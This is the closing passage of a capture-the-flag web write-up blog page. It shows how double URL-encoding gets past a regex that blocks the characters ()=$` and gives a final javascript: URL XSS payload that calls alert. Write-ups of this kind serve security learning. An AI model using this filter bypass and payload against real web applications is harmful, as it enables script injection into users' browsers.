</span></span><span style="display:flex;"><span>                <span style="color:#ff5c57">document</span>.body.append(anchor)
</span></span><span style="display:flex;"><span>            }
</span></span><span style="display:flex;"><span>            
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>        console.log(logs)
</span></span><span style="display:flex;"><span>    &lt;/<span style="color:#ff6ac1">script</span>&gt;
</span></span></code></pre></td></tr></table>
</div>
</div><p>After bypassing the protocol check there is still 1 more Regex</p>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">3
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>pattern <span style="color:#ff6ac1">=</span> <span style="color:#5af78e">r</span><span style="color:#5af78e">&#39;[()=$`]&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#ff6ac1">if</span> <span style="color:#ff5c57">bool</span>(re<span style="color:#ff6ac1">.</span>search(pattern, url, re<span style="color:#ff6ac1">.</span>IGNORECASE <span style="color:#ff6ac1">|</span> re<span style="color:#ff6ac1">.</span>DOTALL)):
</span></span><span style="display:flex;"><span>        <span style="color:#ff6ac1">return</span> <span style="color:#ff6ac1">False</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>This checks returns false if the url contains any of these characters <code>()=$` </code>,<br>
These characters are needed to call functions in Javascript , even though there are ways to do it without <code>()</code>.</p>
<p>We can easily get around this by double urlencoding as javascript also decodes this in the browser .</p>
<h2 id="--final-payloads">🚀  Final Payloads</h2>
<div class="highlight"><div style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;-webkit-user-select:none;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="color:#e2e4e5;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>%02j%0Aavascript:alert%25601%2560
</span></span></code></pre></td></tr></table>
</div>
</div>

        
          <div class="blog-tags">
            
              <a href="https://Alfinj0se.github.io//tags/writeups/">writeups</a>&nbsp;
            
          </div>
        

        
            <hr/>
            <section id="social-share">
              <div class="list-inline footer-links">
                

<div class="share-box" aria-hidden="true">
    <ul class="share">
      
      <li>
        <a href="//twitter.com/share?url=https%3a%2f%2fAlfinj0se.github.io%2fposts%2fmochactf-2024%2f&amp;text=Mocha%20CTF%202024%20Web%20Writeups&amp;via=Alfinjoseph19" target="_blank" title="Share on Twitter">
          <i class="fab fa-twitter"></i>
        </a>
      </li>
  
      
      <li>
        <a href="//www.facebook.com/sharer/sharer.php?u=https%3a%2f%2fAlfinj0se.github.io%2fposts%2fmochactf-2024%2f" target="_blank" title="Share on Facebook">
          <i class="fab fa-facebook"></i>
        </a>
      </li>
  
      
      <li>
        <a href="//reddit.com/submit?url=https%3a%2f%2fAlfinj0se.github.io%2fposts%2fmochactf-2024%2f&amp;title=Mocha%20CTF%202024%20Web%20Writeups" target="_blank" title="Share on Reddit">
          <i class="fab fa-reddit"></i>
        </a>
      </li>
  
      
      <li>
        <a href="//www.linkedin.com/shareArticle?url=https%3a%2f%2fAlfinj0se.github.io%2fposts%2fmochactf-2024%2f&amp;title=Mocha%20CTF%202024%20Web%20Writeups" target="_blank" title="Share on LinkedIn">
          <i class="fab fa-linkedin"></i>
        </a>
      </li>
  
      
      <li>
        <a href="//www.stumbleupon.com/submit?url=https%3a%2f%2fAlfinj0se.github.io%2fposts%2fmochactf-2024%2f&amp;title=Mocha%20CTF%202024%20Web%20Writeups" target="_blank" title="Share on StumbleUpon">
          <i class="fab fa-stumbleupon"></i>
        </a>
      </li>
  
      
      <li>
        <a href="//www.pinterest.com/pin/create/button/?url=https%3a%2f%2fAlfinj0se.github.io%2fposts%2fmochactf-2024%2f&amp;description=Mocha%20CTF%202024%20Web%20Writeups" target="_blank" title="Share on Pinterest">
          <i class="fab fa-pinterest"></i>
        </a>
      </li>
    </ul>
  </div>
  

              </div>
            </section>
        

        
          
            
          

          
                  <h4 class="see-also">See also</h4>
                  <ul>
                
                
                    <li><a href="/posts/intigritixssjuly2024/">Intigriti 0724 XSS Challenge</a></li>
                
                    <li><a href="/posts/kitctf2024/">Flag Remover - KitCTF 2024</a></li>
                
                    <li><a href="/posts/angstromctf2024/">WaterMark as a Service AngstromCTF</a></li>
                
                    <li><a href="/posts/paaad-hackluctf2023/">päääd - Hack.lu CTF 2023 </a></li>
                
              </ul>

          
        
      </article>

      
        <ul class="pager blog-pager">
          
            <li class="previous">
              <a href="https://Alfinj0se.github.io/posts/angstromctf2024/" data-toggle="tooltip" data-placement="top" title="WaterMark as a Service AngstromCTF">&larr; Previous Post</a>
            </li>
          
          
            <li class="next">
              <a href="https://Alfinj0se.github.io/posts/kitctf2024/" data-toggle="tooltip" data-placement="top" title="Flag Remover - KitCTF 2024">Next Post &rarr;</a>
            </li>
          
        </ul>
      


      

    </div>
  </div>
</div>

      
<footer>
  <div class="container">
    
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <ul class="list-inline text-center footer-links">
          
              <li>
		
		  <a href="https://github.com/AlfinJ0se/" title="GitHub">
		
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-github fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
		
		  <a href="https://twitter.com/Alfinjoseph19" title="Twitter">
		
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-twitter fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
		
		  <a href="https://discord.gg/alfin3133" title="Discord">
		
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-discord fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
          
        </ul>
        <p class="credits copyright text-muted">
          
            
              <a href="https://Alfinj0se.github.io">Alfin Joseph</a>
            
          

          &nbsp;&bull;&nbsp;&copy;
          
            2024
          

          
            &nbsp;&bull;&nbsp;
            <a href="https://Alfinj0se.github.io/">Alfins Notes</a>
          
        </p>
        
        <p class="credits theme-by text-muted">
          <a href="https://gohugo.io">Hugo v0.126.1</a> powered &nbsp;&bull;&nbsp; Theme <a href="https://github.com/halogenica/beautifulhugo">Beautiful Hugo</a> adapted from <a href="https://deanattali.com/beautiful-jekyll/">Beautiful Jekyll</a>
          
        </p>
      </div>
    </div>
  </div>
</footer><script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.7/dist/katex.min.js" integrity="sha384-G0zcxDFp5LWZtDuRMnBkk3EphCK1lhEf4UEyEM693ka574TZGwo4IWwS6QLzM/2t" crossorigin="anonymous"></script>
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.7/dist/contrib/auto-render.min.js" integrity="sha384-+VBxd3r6XgURycqtZ117nYw44OOcIax56Z4dCRWbxyPt0Koah1uHoK0o4+/RRE05" crossorigin="anonymous" onload="renderMathInElement(document.body);"></script>
<script src="https://code.jquery.com/jquery-3.7.0.slim.min.js" integrity="sha384-w5y/xIeYixWvfM+A1cEbmHPURnvyqmVg5eVENruEdDjcyRLUSNej7512JQGspFUr" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/js/bootstrap.min.js" integrity="sha384-aJ21OjlMXNL5UyIl/XNwTMqvzeRMZH2w8c5cRVpzpU8Y5bApTppSuUkhZXN0VxHd" crossorigin="anonymous"></script>

<script src="https://Alfinj0se.github.io/js/main.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe.min.js" integrity="sha384-QELNnmcmU8IR9ZAykt67vGr9/rZJdHbiWi64V88fCPaOohUlHCqUD/unNN0BXSqy" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe-ui-default.min.js" integrity="sha384-m67o7SkQ1ALzKZIFh4CiTA8tmadaujiTa9Vu+nqPSwDOqHrDmxLezTdFln8077+q" crossorigin="anonymous"></script><script src="https://Alfinj0se.github.io/js/load-photoswipe.js"></script>









    
  </body>
</html>

